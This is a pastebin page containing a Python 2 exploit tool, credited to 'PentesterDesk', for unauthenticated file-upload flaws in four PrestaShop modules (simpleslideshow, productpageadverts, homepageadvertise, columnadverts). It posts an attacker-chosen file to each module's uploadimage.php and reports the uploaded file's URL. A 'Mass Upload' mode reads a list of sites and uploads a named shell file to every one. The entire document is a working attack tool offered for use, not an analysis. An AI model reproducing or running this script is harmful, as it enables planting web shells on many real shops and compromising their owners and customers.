SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | #################################################################################### | |
3 | #Author : PentesterDesk | |
4 | #Date : 20-June-2016 | |
5 | #Software: Prestashop CMS | |
6 | #vuln Mod: Simpleslideshow , productpageadverts , Homepageadvertise , columnadverts | |
7 | #################################################################################### | |
8 | import sys, os | |
9 | import time | |
10 | import requests | |
11 | def main(): | |
12 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
13 | ||
14 | banner = ''' | |
15 | ||
16 | +======================================================+ | |
17 | | Prestashop | FileUpload Exp | PentesterDesk | | |
18 | | Found by : Muhammad Faisal Gunanda | | |
19 | | Coded by : PentesterDesk Team | | |
20 | | Contact : pentesterdesk@gmail.com | | |
21 | +======================================================+ | |
22 | ''' | |
23 | print banner | |
24 | print "[1] SimpleSlideShow " | |
25 | print "[2] Productpageadverts" | |
26 | print "[3] HomepageAdvertise" | |
27 | print "[4] columnAdverts" | |
28 | ch1=raw_input("\n[>] ") | |
29 | #1 SimpleSlideShow | |
30 | if ch1 == '1': | |
31 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
32 | print banner | |
33 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
34 | print "[1] Single Site " | |
35 | print "[2] Mass Upload" | |
36 | print "[3] GoTo Home" | |
37 | ch2=raw_input("\n[>] ") | |
38 | if ch2 == '3': | |
39 | main() | |
40 | if ch2 == '1': | |
41 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
42 | print banner | |
43 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
44 | url = raw_input("[+] Enter Url : ") | |
45 | filname= raw_input("[+] Enter File : ") | |
46 | if filname == '' or url == '': | |
47 | print "\n[!] Url or File is not entered\n" | |
48 | raw_input("[+] Enter Any key to try agian [>] ") | |
49 | main() | |
50 | #url Logic | |
51 | if '/modules/simpleslideshow/' in url: | |
52 | url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php') | |
53 | elif '/modules/simpleslideshow/uploadimage.php' in url: | |
54 | url=url | |
55 | else: | |
56 | url = url + "/modules/simpleslideshow/uploadimage.php" | |
57 | #main | |
58 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
59 | req=requests.post(url,files=files) | |
60 | if req.status_code == 200 or 'success' in req.text: | |
61 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
62 | print ("[+] %s [ok]" % (url)) | |
63 | else: | |
64 | print "\n[+] %s \n" %url | |
65 | raw_input("\n[+] Press Enter [>] ") | |
66 | main() | |
67 | #Mass upload Logic | |
68 | if ch2 == '2': | |
69 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
70 | print banner | |
71 | print "\n <==============SimpleSlideShow Exploit=================>\n" | |
72 | filee = raw_input("[+] Enter List Name : ") | |
73 | filname= raw_input("[+] Enter Shell Name : ") | |
74 | if filname == '' or filee == '': | |
75 | print "\n[!] Url or File is not entered\n" | |
76 | raw_input("[+] Enter Any key to try agian [>] ") | |
77 | main() | |
78 | ob = open(filee,'r') | |
79 | lists = ob.readlines() | |
80 | list1 = [] | |
81 | i = 0 | |
82 | for i in range(len(lists)): | |
83 | list1.append(lists[i].strip('\n')) | |
84 | ||
85 | count = 0 | |
86 | for site in (list1): | |
87 | count = count + 1 | |
88 | if '/modules/simpleslideshow/' in site: | |
89 | url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php') | |
90 | elif '/modules/simpleslideshow/uploadimage.php' in site: | |
91 | url=site | |
92 | else: | |
93 | url = site + "/modules/simpleslideshow/uploadimage.php" | |
94 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
95 | req=requests.post(url,files=files) | |
96 | if req.status_code == 200 or 'success' in req.text: | |
97 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
98 | print ("[%d] %s [ ok ]" % (count,url)) | |
99 | else: | |
100 | print ("[%d] %s " % (count,url)) | |
101 | raw_input("\n[+] Press Enter [>] ") | |
102 | main() | |
103 | ||
104 | #2 productpageadverts | |
105 | if ch1 == '2': | |
106 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
107 | print banner | |
108 | print "\n <==============Productpageadverts Exploit==============>\n" | |
109 | print "[1] Single Site " | |
110 | print "[2] Mass Upload" | |
111 | print "[3] GoTo Home" | |
112 | ch2=raw_input("\n[>] ") | |
113 | if ch2 == '3': | |
114 | main() | |
115 | if ch2 == '1': | |
116 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
117 | print banner | |
118 | print "\n <==============Productpageadverts Exploit==============>\n" | |
119 | url = raw_input("[+] Enter Url : ") | |
120 | filname= raw_input("[+] Enter File : ") | |
121 | if filname == '' or url == '': | |
122 | print "\n[!] Url or File is not entered\n" | |
123 | raw_input("[+] Enter Any key to try agian [>] ") | |
124 | main() | |
125 | #url Logic | |
126 | if '/modules/productpageadverts/' in url: | |
127 | url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php') | |
128 | elif '/modules/productpageadverts/uploadimage.php' in url: | |
129 | url=url | |
130 | else: | |
131 | url = url + "/modules/productpageadverts/uploadimage.php" | |
132 | #main | |
133 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
134 | req=requests.post(url,files=files) | |
135 | if req.status_code == 200 or 'success' in req.text: | |
136 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
137 | print ("[+] %s [ ok ]" % (url)) | |
138 | else: | |
139 | print "\n\[+] %s \n" %url | |
140 | raw_input("\n[+] Press Enter [>] ") | |
141 | main() | |
142 | #Mass upload Logic | |
143 | if ch2 == '2': | |
144 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
145 | print banner | |
146 | print "\n <==============Productpageadverts Exploit==============>\n" | |
147 | filee = raw_input("\033[1;36m[+] Enter List Name : \033[1;m") | |
148 | filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m") | |
149 | if filname == '' or filee == '': | |
150 | print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n" | |
151 | raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ") | |
152 | main() | |
153 | ob = open(filee,'r') | |
154 | lists = ob.readlines() | |
155 | list1 = [] | |
156 | i = 0 | |
157 | for i in range(len(lists)): | |
158 | list1.append(lists[i].strip('\n')) | |
159 | ||
160 | count = 0 | |
161 | for site in (list1): | |
162 | count = count + 1 | |
163 | if '/modules/productpageadverts/' in site: | |
164 | url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php') | |
165 | elif '/modules/simpleslideshow/uploadimage.php' in site: | |
166 | url=site | |
167 | else: | |
168 | url = site + "/modules/productpageadverts/uploadimage.php" | |
169 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
170 | req=requests.post(url,files=files) | |
171 | if req.status_code == 200 or 'success' in req.text: | |
172 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
173 | print ("[%d] %s [ ok ]" % (count,url)) | |
174 | else: | |
175 | print ("[%d] %s " % (count,url)) | |
176 | raw_input("\n[+] Press Enter [>] ") | |
177 | main() | |
178 | #3 homepageadvertise | |
179 | if ch1 == '3': | |
180 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
181 | print banner | |
182 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
183 | print "[1] Single Site " | |
184 | print "[2] Mass Upload" | |
185 | print "[3] GoTo Home" | |
186 | ch2=raw_input("\n[>] ") | |
187 | if ch2 == '3': | |
188 | main() | |
189 | if ch2 == '1': | |
190 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
191 | print banner | |
192 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
193 | url = raw_input("[+] Enter Url : ") | |
194 | filname= raw_input("[+] Enter File : ") | |
195 | if filname == '' or url == '': | |
196 | print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n" | |
197 | raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ") | |
198 | main() | |
199 | #url Logic | |
200 | if '/modules/homepageadvertise/' in url: | |
201 | url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php') | |
202 | elif '/modules/homepageadvertise/uploadimage.php' in url: | |
203 | url=url | |
204 | else: | |
205 | url = url + "/modules/homepageadvertise/uploadimage.php" | |
206 | #main | |
207 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
208 | req=requests.post(url,files=files) | |
209 | if req.status_code == 200 or 'success' in req.text: | |
210 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
211 | print ("[+] %s [ ok ]" % (url)) | |
212 | else: | |
213 | print "\n[+] %s \n" %url | |
214 | raw_input("\n[+] Press Enter [>] ") | |
215 | main() | |
216 | #Mass upload Logic | |
217 | if ch2 == '2': | |
218 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
219 | print banner | |
220 | print "\n <==============HomePageAdvertise Exploit===============>\n" | |
221 | filee = raw_input("[+] Enter List Name : ") | |
222 | filname= raw_input("[+] Enter Shell Name : ") | |
223 | if filname == '' or filee == '': | |
224 | print "\n\[!] Url or File is not entered\n" | |
225 | raw_input("[+] Enter Any key to try agian [>] ") | |
226 | main() | |
227 | ob = open(filee,'r') | |
228 | lists = ob.readlines() | |
229 | list1 = [] | |
230 | i = 0 | |
231 | for i in range(len(lists)): | |
232 | list1.append(lists[i].strip('\n')) | |
233 | ||
234 | count = 0 | |
235 | for site in (list1): | |
236 | count = count + 1 | |
237 | if '/modules/homepageadvertise/' in site: | |
238 | url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php') | |
239 | elif '/modules/homepageadvertise/uploadimage.php' in site: | |
240 | url=site | |
241 | else: | |
242 | url = site + "/modules/homepageadvertise/uploadimage.php" | |
243 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
244 | req=requests.post(url,files=files) | |
245 | if req.status_code == 200 or 'success' in req.text: | |
246 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
247 | print ("[%d]] %s [ ok ]" % (count,url)) | |
248 | else: | |
249 | print ("[%d] %s " % (count,url)) | |
250 | raw_input("\n[+] Press Enter [>] ") | |
251 | main() | |
252 | #4 columnadverts | |
253 | if ch1 == '4': | |
254 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
255 | print banner | |
256 | print "\n <================ColumnAdvers Exploit==================>\n" | |
257 | print "[1] Single Site " | |
258 | print "[2] Mass Upload" | |
259 | print "[3] GoTo Home" | |
260 | ch2=raw_input("\n[>] ") | |
261 | if ch2 == '3': | |
262 | main() | |
263 | if ch2 == '1': | |
264 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
265 | print banner | |
266 | print "\n <================ColumnAdvers Exploit==================>\n" | |
267 | url = raw_input("[+] Enter Url : ") | |
268 | filname= raw_input("[+] Enter File : ") | |
269 | if filname == '' or url == '': | |
270 | print "\n[!] Url or File is not entered\n" | |
271 | raw_input("[+] Enter Any key to try agian [>] ") | |
272 | main() | |
273 | #url Logic | |
274 | if '/modules/columnadverts/' in url: | |
275 | url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php') | |
276 | elif '/modules/columnadverts/uploadimage.php' in url: | |
277 | url=url | |
278 | else: | |
279 | url = url + "/modules/columnadverts/uploadimage.php" | |
280 | #main | |
281 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
282 | req=requests.post(url,files=files) | |
283 | if req.status_code == 200 or 'success' in req.text: | |
284 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
285 | print ("[+] %s [ ok ]" % (url)) | |
286 | else: | |
287 | print "\n[+] %s \n" %url | |
288 | raw_input("\n[+] Press Enter [>] ") | |
289 | main() | |
290 | #Mass upload Logic | |
291 | if ch2 == '2': | |
292 | os.system('cls' and 'color -a' if os.name == "nt" else 'clear') | |
293 | print banner | |
294 | print "\n <================ColumnAdvers Exploit==================>\n" | |
295 | filee = raw_input("[+] Enter List Name : ") | |
296 | filname= raw_input("[+] Enter Shell Name : ") | |
297 | if filname == '' or filee == '': | |
298 | print "\n[!] Url or File is not entered\n" | |
299 | raw_input("[+] Enter Any key to try agian [>] ") | |
300 | main() | |
301 | ob = open(filee,'r') | |
302 | lists = ob.readlines() | |
303 | list1 = [] | |
304 | i = 0 | |
305 | for i in range(len(lists)): | |
306 | list1.append(lists[i].strip('\n')) | |
307 | ||
308 | count = 0 | |
309 | for site in (list1): | |
310 | count = count + 1 | |
311 | if '/modules/columnadverts/' in site: | |
312 | url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php') | |
313 | elif '/modules/columnadverts/uploadimage.php' in site: | |
314 | url=site | |
315 | else: | |
316 | url = site + "/modules/columnadverts/uploadimage.php" | |
317 | files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} | |
318 | req=requests.post(url,files=files) | |
319 | if req.status_code == 200 or 'success' in req.text: | |
320 | url=url.replace('/uploadimage.php','/slides/'+filname) | |
321 | print ("[%d] %s [ ok ]" % (count,url)) | |
322 | else: | |
323 | print ("[%d] %s " % (count,url)) | |
324 | raw_input("\n[+] Press Enter [>] ") | |
325 | main() | |
326 | if __name__ == "__main__": | |
327 | main() |